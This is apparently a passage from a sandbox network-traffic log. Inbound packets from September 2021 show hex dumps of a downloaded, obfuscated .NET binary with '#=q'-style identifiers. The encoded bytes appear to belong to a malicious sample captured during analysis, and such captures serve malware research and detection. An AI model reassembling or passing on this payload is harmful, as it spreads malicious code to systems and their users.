2021-09-14 14:47:58 UTC	84	IN	Data Raw: 34 33 46 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 35 2d 2d 2d 2d 2d 34 2d 33 32 38 38 36 2d 2d 2d 2d 2d 41 37 34 33 46 2d 2d 2d 2d 2d 32 31 41 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 38 35 2d 2d 2d 2d 2d 41 37 34 33 43 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 36 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 Data Ascii: 43F-----21C2D-326262A7D95-----42BF8---33--9--1F---------------2-27B95-----4-32886-----A743F-----21A2D-326262A7D95-----42BF8---33--9--1F---------------2-27B96-----4-32885-----A743C-----21C2D-326262A7D96-----42BF8---33--9--1F---------------2-27B96-----4-328
2021-09-14 14:47:58 UTC	91	IN	Data Raw: 45 2d 31 2d 2d 2d 41 2d 32 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 36 35 38 31 39 32 44 31 37 32 36 32 36 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 38 45 42 37 33 33 35 41 32 42 2d 41 2d 41 32 42 43 39 37 44 42 31 2d 2d 2d 2d 2d 34 32 42 45 34 2d 32 37 42 39 37 2d 2d 2d 2d 2d 34 31 37 32 44 2d 36 32 36 2d 39 32 43 31 32 32 42 2d 33 2d 44 32 42 46 38 2d 39 2d 32 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 36 2d 32 31 36 31 41 32 44 31 45 32 36 32 36 2d 32 37 43 42 34 2d 2d 2d 2d 2d 34 31 36 32 38 2d 36 2d 2d 2d 2d 32 42 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 41 2d 2d 2d 2d 2d 2d 34 33 32 2d 45 32 42 2d 37 37 44 42 38 2d 2d 2d 2d 2d 34 32 42 44 44 32 38 45 37 2d 31 2d 2d 2d 41 2d 36 2d 35 2d 34 35 39 Data Ascii: E-1---A-2-27BB1-----4-658192D172626-27BB1-----4-27BB4-----48EB7335A2B-A-A2BC97DB1-----42BE4-27B97-----4172D-626-92C122B-3-D2BF8-9-2-27BB4-----46FAD-1---6-2161A2D1E2626-27CB4-----41628-6----2B-27BB1-----4-27BA------432-E2B-77DB8-----42BDD28E7-1---A-6-5-459
2021-09-14 14:47:58 UTC	98	IN	Data Raw: 42 35 34 42 43 43 41 43 35 31 33 37 41 44 42 44 45 38 37 44 44 35 42 36 31 39 37 36 34 38 41 43 34 37 42 34 38 36 35 38 31 34 42 42 46 41 33 32 2d 38 44 31 33 41 41 44 35 43 37 31 45 37 2d 46 41 42 36 46 36 33 32 43 45 33 43 31 38 37 46 45 45 45 43 39 35 34 42 42 46 41 33 45 39 44 45 36 35 2d 35 45 38 34 42 42 46 41 33 37 36 34 37 34 45 38 42 32 43 43 31 42 39 46 35 34 42 42 46 41 33 46 46 44 43 36 34 41 34 43 39 39 37 35 41 43 36 45 39 45 46 42 31 43 44 38 33 33 43 39 46 43 42 36 37 35 42 44 31 38 37 45 37 44 46 34 42 42 46 41 33 43 42 43 43 31 46 39 39 33 45 42 45 36 37 42 39 37 2d 46 43 37 37 39 38 31 2d 32 44 41 31 41 37 31 39 33 44 38 2d 31 37 41 37 39 2d 38 36 34 35 45 36 46 43 32 37 34 42 42 46 41 33 37 42 41 42 35 2d 34 46 44 2d 2d 35 39 42 43 38 Data Ascii: B54BCCAC5137ADBDE87DD5B6197648AC47B4865814BBFA32-8D13AAD5C71E7-FAB6F632CE3C187FEEEC954BBFA3E9DE65-5E84BBFA376474E8B2CC1B9F54BBFA3FFDC64A4C9975AC6E9EFB1CD833C9FCB675BD187E7DF4BBFA3CBCC1F993EBE67B97-FC77981-2DA1A7193D8-17A79-8645E6FC274BBFA37BAB5-4FD--59BC8
2021-09-14 14:47:58 UTC	105	IN	Data Raw: 36 2d 36 2d 2d 31 31 2d 37 34 44 2d 36 2d 36 2d 2d 31 38 2d 37 34 44 2d 36 2d 36 2d 2d 32 35 2d 37 34 44 2d 36 2d 36 2d 2d 33 2d 2d 37 35 39 2d 2d 2d 36 2d 2d 33 35 2d 37 35 39 2d 2d 31 32 2d 2d 34 37 2d 37 34 42 2d 37 31 32 2d 2d 35 36 2d 37 34 42 2d 37 31 32 2d 2d 35 46 2d 37 34 42 2d 37 31 32 2d 2d 36 39 2d 37 34 42 2d 37 31 32 2d 2d 37 34 2d 37 34 42 2d 37 31 32 2d 2d 38 2d 2d 37 38 45 2d 37 31 32 2d 2d 41 31 2d 37 38 45 2d 37 31 32 2d 2d 41 45 2d 37 38 45 2d 37 31 32 2d 2d 42 42 2d 37 38 45 2d 37 31 32 2d 2d 43 32 2d 37 38 45 2d 37 31 32 2d 2d 44 37 2d 37 38 45 2d 37 31 32 2d 2d 45 43 2d 37 38 45 2d 37 31 32 2d 2d 46 38 2d 37 38 45 2d 37 31 32 2d 2d 2d 38 2d 38 38 45 2d 37 2d 36 2d 2d 31 33 2d 38 35 39 2d 2d 2d 36 2d 2d 31 41 2d 38 35 39 2d 2d 2d 36 Data Ascii: 6-6--11-74D-6-6--18-74D-6-6--25-74D-6-6--3--759---6--35-759--12--47-74B-712--56-74B-712--5F-74B-712--69-74B-712--74-74B-712--8--78E-712--A1-78E-712--AE-78E-712--BB-78E-712--C2-78E-712--D7-78E-712--EC-78E-712--F8-78E-712---8-88E-7-6--13-859---6--1A-859---6
2021-09-14 14:47:58 UTC	113	IN	Data Raw: 2d 35 37 32 36 33 32 2d 31 32 35 2d 2d 46 38 32 44 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 41 42 32 36 36 37 2d 2d 32 37 2d 2d 32 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 44 42 32 36 36 37 2d 2d 32 37 2d 2d 36 2d 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 31 38 46 33 31 41 44 45 2d 2d 32 37 2d 2d 38 34 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 42 34 33 32 37 33 39 2d 31 32 38 2d 2d 39 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 35 31 32 37 2d 35 2d 31 32 38 2d 2d 44 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 37 37 32 37 33 44 2d 31 32 39 2d 2d 46 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 39 45 32 37 36 37 2d 2d 32 41 2d 2d 2d 38 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 41 39 32 37 34 32 2d 31 32 41 2d 2d 38 43 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 2d 41 Data Ascii: -572632-125--F82D---------6--AB2667--27--2C2E---------6--DB2667--27--6-2E---------618F31ADE--27--842E--------66-B432739-128--9C2E--------66-35127-5-128--DC2E--------66-377273D-129--FC2E--------66-39E2767--2A---82F--------66-3A92742-12A--8C2F--------66-3-A
2021-09-14 14:47:58 UTC	120	IN	Data Raw: 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 42 31 37 41 33 43 2d 32 33 31 2d 31 36 34 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 46 35 37 41 33 43 2d 32 33 31 2d 31 39 2d 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 33 39 37 42 33 43 2d 32 33 31 2d 31 42 43 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 37 44 37 42 46 39 2d 33 33 31 2d 31 45 38 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 41 44 37 42 46 39 2d 33 33 31 2d 31 31 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 44 44 37 42 46 39 2d 33 33 31 2d 31 34 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 2d 44 37 43 46 39 2d 33 33 31 2d 31 37 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 35 31 37 43 46 39 2d 33 33 31 2d 31 41 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 39 35 37 43 46 39 2d 33 33 31 2d 31 44 38 41 34 2d 2d Data Ascii: 3--------16--B17A3C-231-164A3--------16--F57A3C-231-19-A3--------16--397B3C-231-1BCA3--------16--7D7BF9-331-1E8A3--------16--AD7BF9-331-118A4--------16--DD7BF9-331-148A4--------16---D7CF9-331-178A4--------16--517CF9-331-1A8A4--------16--957CF9-331-1D8A4--
2021-09-14 14:47:58 UTC	127	IN	Data Raw: 2d 2d 44 36 46 2d 2d 2d 2d 2d 31 2d 2d 35 39 36 46 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 2d 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 2d 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 44 39 37 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 33 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 31 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 31 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 31 2d 2d 2d 2d 2d 31 2d 2d 46 35 37 31 2d 2d 2d 2d 2d 32 2d 2d 31 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 2d 31 35 38 2d 2d 2d 2d 2d 31 2d 2d 34 39 37 32 2d 2d 2d 2d 2d 31 2d 2d 36 35 37 32 2d 2d 2d 2d 2d 32 2d 2d 38 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 43 39 37 33 2d 2d 2d 2d 2d 31 2d 2d 2d 31 37 34 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 34 2d 2d 2d 2d 2d 31 2d 2d 38 35 Data Ascii: --D6F-----1--596F-----1--4D7------1--857------1--A17------2--BD7------1--D97------2---971-----1--3971-----1--8571-----1--A171-----2--BD71-----1--F571-----2--1172-----1---158-----1--4972-----1--6572-----2--8172-----1--C973-----1---174-----1--4D74-----1--85
2021-09-14 14:47:58 UTC	134	IN	Data Raw: 2d 44 38 41 39 33 41 2d 41 36 43 2d 2d 39 44 41 39 39 43 2d 2d 36 43 2d 2d 39 37 41 41 33 2d 2d 46 31 39 2d 36 46 33 31 41 32 45 31 33 34 39 2d 2d 46 33 31 41 36 37 2d 2d 46 39 2d 35 46 33 31 41 43 43 31 32 37 31 2d 35 46 33 31 41 39 38 2d 31 37 31 2d 35 45 38 31 43 41 36 2d 2d 32 31 2d 35 46 33 31 41 42 41 31 33 41 31 2d 34 46 33 31 41 43 34 31 33 44 39 2d 34 46 35 42 31 44 35 31 33 44 31 2d 34 2d 41 42 32 44 42 31 33 42 39 2d 34 46 33 31 41 46 35 31 33 41 39 2d 34 31 34 42 32 39 43 2d 2d 41 39 2d 34 32 35 42 32 46 43 31 33 44 31 2d 34 46 33 31 41 46 43 31 33 44 39 2d 34 46 33 31 41 2d 33 31 34 43 39 2d 34 31 34 42 32 39 43 2d 2d 43 39 2d 34 32 35 42 32 46 43 31 33 35 39 2d 35 37 46 41 39 35 36 2d 34 37 31 2d 35 46 33 31 41 36 37 2d 2d 37 31 2d 35 33 33 Data Ascii: -D8A93A-A6C--9DA99C--6C--97AA3--F19-6F31A2E1349--F31A67--F9-5F31ACC1271-5F31A98-171-5E81CA6--21-5F31ABA13A1-4F31AC413D9-4F5B1D513D1-4-AB2DB13B9-4F31AF513A9-414B29C--A9-425B2FC13D1-4F31AFC13D9-4F31A-314C9-414B29C--C9-425B2FC1359-57FA956-471-5F31A67--71-533
2021-09-14 14:47:58 UTC	141	IN	Data Raw: 42 34 36 37 32 36 31 36 44 36 35 2d 2d 35 33 37 34 36 31 36 33 36 42 35 34 37 32 36 31 36 33 36 35 2d 2d 34 34 36 46 37 35 36 32 36 43 36 35 2d 2d 35 32 36 35 36 33 37 34 36 31 36 45 36 37 36 43 36 35 2d 2d 35 33 36 39 37 41 36 35 2d 2d 34 35 36 45 37 35 36 44 2d 2d 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 2d 2d 35 33 37 2d 36 35 36 33 36 39 36 31 36 43 34 36 36 46 36 43 36 34 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 31 37 32 36 37 37 33 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 36 2d 33 31 2d 2d 34 35 37 38 36 33 36 35 37 2d 37 34 36 39 36 46 36 45 2d 2d 34 37 34 33 2d 2d 34 37 37 35 36 39 36 34 2d 2d 34 39 Data Ascii: B4672616D65--537461636B5472616365--446F75626C65--52656374616E676C65--53697A65--456E756D--456E7669726F6E6D656E74--537-656369616C466F6C646572--4576656E7441726773--4576656E7448616E646C6572--4576656E7448616E646C65726-31--457863657-74696F6E--4743--47756964--49
2021-09-14 14:47:58 UTC	149	IN	Data Raw: 36 34 39 37 37 33 37 34 34 37 33 36 38 36 37 34 45 35 37 34 37 37 36 36 35 34 31 37 36 34 32 35 31 33 44 2d 2d 32 33 33 44 37 31 36 38 34 35 33 32 35 2d 33 32 36 42 33 34 33 36 36 41 36 39 35 33 35 33 36 41 34 46 33 38 33 36 36 37 33 33 36 45 34 32 33 31 34 44 36 42 34 43 34 37 34 33 33 39 35 46 33 33 36 31 37 36 34 34 37 2d 34 39 33 37 36 39 35 39 36 32 35 35 34 38 37 32 33 35 36 37 33 44 2d 2d 32 33 33 44 37 31 37 36 35 38 32 34 34 41 33 32 33 34 37 32 34 39 33 2d 36 35 34 41 33 2d 36 37 35 37 36 36 34 31 33 36 34 33 34 35 36 34 37 41 35 36 34 41 34 45 33 37 36 32 35 31 34 45 35 46 35 39 35 34 37 35 35 33 33 39 33 38 34 45 33 2d 37 39 37 39 34 44 35 39 35 2d 36 46 33 44 2d 2d 32 33 33 44 37 31 33 36 34 45 36 35 36 45 36 36 35 31 36 32 37 41 35 31 35 39 Data Ascii: 6497737447368674E57477665417642513D--233D716845325-326B34366A6953536A4F383667336E42314D6B4C4743395F336176447-493769596255487235673D--233D717658244A323472493-654A3-67576641364345647A564A4E3762514E5F5954755339384E3-79794D595-6F3D--233D71364E656E6651627A5159
2021-09-14 14:47:58 UTC	156	IN	Data Raw: 33 33 37 35 46 37 41 34 43 34 33 34 45 36 34 34 36 34 33 36 39 34 38 37 34 35 2d 34 38 33 31 37 39 35 32 33 39 33 38 37 37 33 37 35 34 36 32 36 44 37 32 35 33 33 34 37 36 35 35 34 35 33 44 2d 2d 34 35 36 45 36 34 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 33 39 33 35 37 37 33 39 34 44 37 2d 36 31 34 37 33 34 35 41 36 33 36 37 36 42 34 37 36 37 36 45 36 44 35 31 34 39 35 34 34 46 36 34 34 38 37 32 33 35 34 39 36 31 34 43 35 38 34 34 33 38 36 31 34 33 33 36 36 46 33 33 34 35 37 31 37 34 34 35 33 2d 35 2d 35 31 33 44 2d 2d 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 37 38 37 2d 33 36 36 33 37 34 33 34 34 41 34 37 34 43 36 31 34 44 34 34 36 32 37 37 36 37 33 36 36 36 36 42 37 32 34 39 34 35 37 37 33 44 33 44 2d 2d 32 33 33 44 Data Ascii: 3375F7A4C434E6446436948745-483179523938773754626D7253347655453D--456E64496E766F6B65--233D71393577394D7-6147345A63676B47676E6D5149544F6448723549614C5844386143366F33457174453-5-513D--496E766F6B65--233D71787-366374344A474C614D4462776736666B724945773D3D--233D
2021-09-14 14:47:58 UTC	163	IN	Data Raw: 36 36 37 33 44 33 44 2d 2d 34 35 36 45 37 34 37 32 37 39 34 35 37 38 36 39 37 33 37 34 37 33 2d 2d 34 37 36 35 37 34 34 35 36 45 37 34 37 32 36 39 36 35 37 33 2d 2d 32 33 33 44 37 31 33 32 36 37 37 34 36 38 37 36 34 32 33 36 33 32 36 45 33 2d 33 37 36 36 35 39 35 36 35 34 37 38 33 35 36 36 37 37 34 39 37 31 37 38 34 32 34 31 36 46 33 31 37 34 35 46 36 38 37 33 32 34 36 39 36 43 33 39 34 31 36 33 32 34 33 34 34 36 35 39 35 46 34 37 37 37 33 44 2d 2d 32 33 33 44 37 31 37 32 33 35 37 31 37 2d 37 36 34 46 35 2d 36 45 34 43 37 38 34 43 37 2d 33 36 36 31 34 37 36 42 36 36 34 31 34 44 33 37 37 37 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 36 33 35 37 41 36 45 34 36 36 37 33 2d 35 46 33 32 33 33 33 34 36 45 36 36 36 45 36 38 34 43 33 34 34 39 33 38 37 39 35 32 Data Ascii: 6673D3D--456E747279457869737473--476574456E7472696573--233D7132677468764236326E3-37665956547835667749717842416F31745F687324696C394163243446595F47773D--233D717235717-764F5-6E4C784C7-3661476B66414D3777513D3D--233D7136357A6E46673-5F3233346E666E684C3449387952
2021-09-14 14:47:58 UTC	170	IN	Data Raw: 37 34 44 33 33 36 44 34 46 37 36 36 36 37 34 37 32 37 37 33 44 2d 2d 32 33 33 44 37 31 36 42 36 33 35 36 36 42 34 41 37 33 36 42 37 35 34 37 34 31 33 34 36 46 33 37 36 42 34 37 37 35 34 45 33 37 33 39 36 39 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 33 33 34 39 37 34 36 34 33 31 34 35 34 43 34 34 35 2d 34 38 34 41 37 38 36 38 34 43 37 36 37 34 33 2d 37 39 33 31 34 45 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 35 38 36 42 36 37 37 2d 36 36 36 37 36 38 37 36 35 34 34 42 34 34 35 41 34 37 36 43 35 38 34 32 34 37 34 39 33 34 37 38 33 39 37 36 36 35 35 31 34 46 33 34 34 41 36 36 36 41 34 36 33 37 34 37 35 37 33 32 34 35 34 33 37 37 33 39 32 34 34 43 33 33 34 35 37 36 37 39 34 42 35 41 34 37 34 46 36 45 37 41 36 39 37 37 35 38 34 35 33 32 35 38 37 32 Data Ascii: 74D336D4F76667472773D--233D716B63566B4A736B754741346F376B47754E37396931773D3D--233D71643349746431454C445-484A78684C76743-79314E513D3D--233D71586B677-66676876544B445A476C584247493478397665514F344A666A463747573245437739244C334576794B5A474F6E7A69775845325872
2021-09-14 14:47:58 UTC	178	IN	Data Raw: 2d 34 32 35 32 34 41 36 34 34 31 37 33 35 39 36 43 35 38 35 33 35 32 35 35 36 33 37 37 36 39 37 41 37 37 33 44 2d 2d 32 33 33 44 37 31 36 46 37 36 36 33 33 2d 34 41 33 37 34 42 33 36 36 32 33 39 34 35 37 31 35 46 34 33 33 2d 34 42 33 34 33 36 37 32 36 32 36 44 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 37 36 36 32 35 34 34 45 34 32 36 39 36 38 34 37 33 32 37 41 34 31 35 32 37 33 36 35 37 37 36 42 35 32 34 39 34 36 35 34 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 35 36 41 33 33 37 37 37 36 34 41 35 38 36 43 36 45 37 32 34 37 36 44 35 32 36 45 34 42 35 35 34 38 37 32 35 46 33 31 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 35 34 39 35 2d 36 33 36 45 36 34 34 46 34 43 37 32 35 36 33 32 34 37 34 41 36 44 36 45 36 46 33 37 37 41 34 42 37 34 34 32 Data Ascii: -42524A644173596C585352556377697A773D--233D716F76633-4A374B36623945715F433-4B343672626D673D3D--233D717662544E42696847327A41527365776B5249465453513D3D--233D71356A3377764A586C6E72476D526E4B5548725F3153513D3D--233D7145495-636E644F4C725632474A6D6E6F377A4B7442
2021-09-14 14:47:58 UTC	185	IN	Data Raw: 37 36 41 35 46 36 37 37 34 33 31 33 32 34 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 34 39 36 44 35 2d 34 31 35 39 33 31 36 46 33 33 35 39 36 38 36 32 34 43 37 34 37 35 36 42 37 37 34 33 35 31 33 39 33 31 36 33 34 39 35 33 36 31 36 35 34 39 34 35 35 37 35 32 34 42 35 33 35 39 37 32 34 37 35 41 33 33 36 34 35 34 35 36 36 45 36 42 35 39 33 44 2d 2d 32 33 33 44 37 31 35 46 36 42 34 37 37 39 34 35 36 45 33 38 34 42 37 32 36 44 34 32 36 44 37 34 33 35 34 44 33 31 34 45 33 39 36 33 35 35 35 33 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 32 34 36 45 36 41 36 46 37 2d 35 32 37 32 35 2d 36 32 36 43 37 31 36 35 32 34 37 39 37 32 37 33 32 34 37 32 37 33 37 35 33 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 37 41 36 31 33 37 34 46 33 31 34 31 34 38 37 32 37 32 Data Ascii: 76A5F6774313245513D3D--233D7164496D5-4159316F335968624C74756B77435139316349536165494557524B535972475A336454566E6B593D--233D715F6B4779456E384B726D426D74354D314E39635553673D3D--233D71246E6A6F7-52725-626C7165247972732472737535513D3D--233D717A61374F3141487272
2021-09-14 14:47:58 UTC	192	IN	Data Raw: 34 35 37 37 34 33 36 36 36 35 32 36 32 36 35 35 37 36 46 37 38 33 31 37 35 34 45 33 33 37 36 36 36 35 33 35 2d 33 35 37 36 35 46 35 37 35 46 37 37 36 33 33 44 2d 2d 32 33 33 44 37 31 33 2d 35 2d 34 44 36 33 35 38 35 31 34 41 37 38 36 33 34 43 34 43 37 32 33 31 37 33 35 39 34 46 33 2d 36 36 37 2d 37 39 36 38 35 2d 36 41 35 35 37 37 36 41 35 31 37 34 34 39 36 45 34 43 35 46 37 36 34 41 35 2d 35 31 35 33 36 37 34 33 37 33 36 36 36 39 36 46 33 44 2d 2d 32 33 33 44 37 31 34 38 36 31 37 35 36 39 36 41 36 44 36 38 33 32 36 45 34 41 33 35 36 42 34 38 34 46 33 36 36 36 35 34 35 39 34 32 36 45 34 41 34 36 35 41 34 42 36 42 36 36 37 41 36 42 35 37 37 34 33 35 36 37 34 32 33 34 36 44 35 39 35 33 33 35 34 46 34 43 34 46 35 36 36 33 33 44 2d 2d 32 33 33 44 37 31 37 2d Data Ascii: 457743666526265576F7831754E337666535-35765F575F77633D--233D713-5-4D6358514A78634C4C723173594F3-667-79685-6A55776A5174496E4C5F764A5-515367437366696F3D--233D71486175696A6D68326E4A356B484F36665459426E4A465A4B6B667A6B5774356742346D5953354F4C4F56633D--233D717-
2021-09-14 14:47:58 UTC	199	IN	Data Raw: 38 36 31 34 35 35 37 36 45 33 39 37 39 35 41 36 39 34 39 37 39 36 34 34 35 34 33 36 36 33 36 33 39 32 34 36 42 37 34 36 41 33 2d 34 39 35 2d 34 34 33 35 37 37 34 31 37 37 34 33 33 32 34 38 33 35 34 33 36 33 33 38 34 33 32 34 34 43 2d 2d 32 33 33 44 37 31 37 31 37 33 33 31 36 44 36 46 34 46 32 34 36 44 35 39 36 31 35 33 33 37 33 32 34 46 35 38 34 46 35 37 36 35 33 2d 35 41 33 36 34 37 37 39 36 33 37 33 36 43 34 35 36 32 33 36 36 35 33 39 34 39 37 2d 36 46 37 39 33 37 37 2d 37 2d 35 37 33 2d 34 46 33 35 36 31 36 32 34 39 37 2d 33 2d 33 35 36 31 36 41 37 36 33 38 36 34 36 46 37 31 36 34 34 41 35 41 34 38 36 43 34 45 33 33 36 33 34 42 2d 2d 32 33 33 44 37 31 37 39 34 35 34 38 33 35 33 34 34 39 35 37 32 34 36 36 33 39 36 36 35 35 34 41 36 32 33 37 34 36 34 46 Data Ascii: 86145576E39795A694979644543663639246B746A3-495-44357741774332483543633843244C--233D717173316D6F4F246D59615337324F584F57653-5A36477963736C4562366539497-6F79377-7-573-4F356162497-3-35616A7638646F71644A5A486C4E33634B--233D717945483534495724663966554A6237464F
2021-09-14 14:47:58 UTC	207	IN	Data Raw: 35 36 34 36 44 34 37 34 31 33 44 2d 2d 32 33 33 44 37 31 34 36 36 43 37 41 32 34 32 34 37 36 36 38 36 43 37 32 36 45 35 41 36 32 33 37 35 39 34 46 36 41 36 39 33 2d 36 35 34 36 35 46 35 31 35 41 34 32 37 41 36 42 34 46 36 31 36 41 35 34 33 2d 37 37 33 33 35 35 36 46 35 31 36 32 36 37 36 45 35 38 35 36 34 39 34 31 33 44 2d 2d 32 33 33 44 37 31 36 39 36 42 34 32 35 38 35 46 34 33 36 44 35 33 32 34 35 41 37 41 35 36 34 31 37 35 37 31 32 34 36 45 35 31 34 41 34 32 34 34 37 37 36 44 34 43 36 44 33 35 34 37 36 35 36 35 33 31 36 39 35 2d 36 43 35 2d 37 35 37 36 34 39 33 31 33 38 33 38 34 35 36 41 36 46 33 44 2d 2d 32 33 33 44 37 31 34 39 34 46 35 38 35 46 37 32 37 37 34 38 37 32 35 33 35 46 35 32 34 43 34 36 34 43 33 32 36 39 36 37 37 41 35 32 37 33 35 35 35 31 Data Ascii: 5646D47413D--233D71466C7A242476686C726E5A6237594F6A693-65465F515A427A6B4F616A543-7733556F5162676E585649413D--233D71696B42585F436D53245A7A56417571246E514A4244776D4C6D3547656531695-6C5-757649313838456A6F3D--233D71494F585F72774872535F524C464C3269677A52735551
2021-09-14 14:47:58 UTC	214	IN	Data Raw: 44 37 31 36 34 33 38 35 37 34 39 35 41 34 46 33 38 36 36 33 36 34 39 35 32 37 31 36 34 35 35 36 44 37 36 37 38 36 31 37 37 36 41 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 34 39 35 41 35 2d 33 38 34 39 35 38 33 36 33 2d 36 37 35 33 35 39 34 36 33 38 33 32 36 42 37 35 35 41 36 35 36 41 36 44 36 37 33 38 37 2d 34 46 36 46 35 38 36 36 34 35 34 32 36 33 37 41 36 31 37 2d 35 34 35 34 37 37 36 37 37 32 35 37 34 44 32 34 36 36 34 44 33 44 2d 2d 32 33 33 44 37 31 35 35 35 32 34 39 37 38 34 44 34 46 34 37 33 2d 34 38 34 39 36 44 37 37 34 35 35 2d 33 34 34 31 33 36 37 41 34 35 36 39 35 2d 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 35 33 31 36 37 33 36 36 44 33 31 34 33 36 39 34 41 33 35 37 39 37 41 34 43 34 35 34 33 36 46 37 38 33 31 36 38 34 32 37 32 37 37 Data Ascii: D71643857495A4F38663649527164556D767861776A31773D3D--233D71495A5-384958363-6753594638326B755A656A6D67387-4F6F58664542637A617-5454776772574D24664D3D--233D71555249784D4F473-48496D77455-3441367A45695-673D3D--233D71553167366D3143694A35797A4C45436F783168427277
2021-09-14 14:47:58 UTC	221	IN	Data Raw: 45 33 39 36 45 33 34 36 36 34 42 34 31 37 33 37 36 35 37 35 34 33 39 36 33 36 39 37 33 36 31 34 38 35 34 35 46 35 2d 36 37 37 36 36 33 34 37 34 31 34 45 36 45 36 34 33 36 36 46 33 44 2d 2d 32 33 33 44 37 31 34 42 33 35 34 44 36 36 33 39 37 35 37 38 34 34 34 33 36 41 37 37 34 34 35 32 36 36 37 39 34 41 35 31 33 36 36 42 37 2d 33 38 34 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 36 35 41 33 38 37 38 36 44 33 36 33 39 34 33 36 34 33 2d 34 33 33 35 33 35 34 39 37 2d 33 32 34 46 35 32 36 36 33 37 34 45 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 35 36 35 38 34 32 35 46 37 39 33 33 36 35 34 45 35 46 37 33 37 2d 33 31 32 34 34 44 36 34 33 39 35 35 36 46 34 41 36 35 35 39 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 33 33 37 36 41 36 36 36 33 36 35 34 34 37 2d 37 36 Data Ascii: E396E34664B4173765754396369736148545F5-67766347414E6E64366F3D--233D714B354D6639757844436A77445266794A51366B7-38413D3D--233D71465A38786D363943643-433535497-324F5266374E673D3D--233D715658425F7933654E5F737-31244D6439556F4A6559513D3D--233D7133376A666365447-76
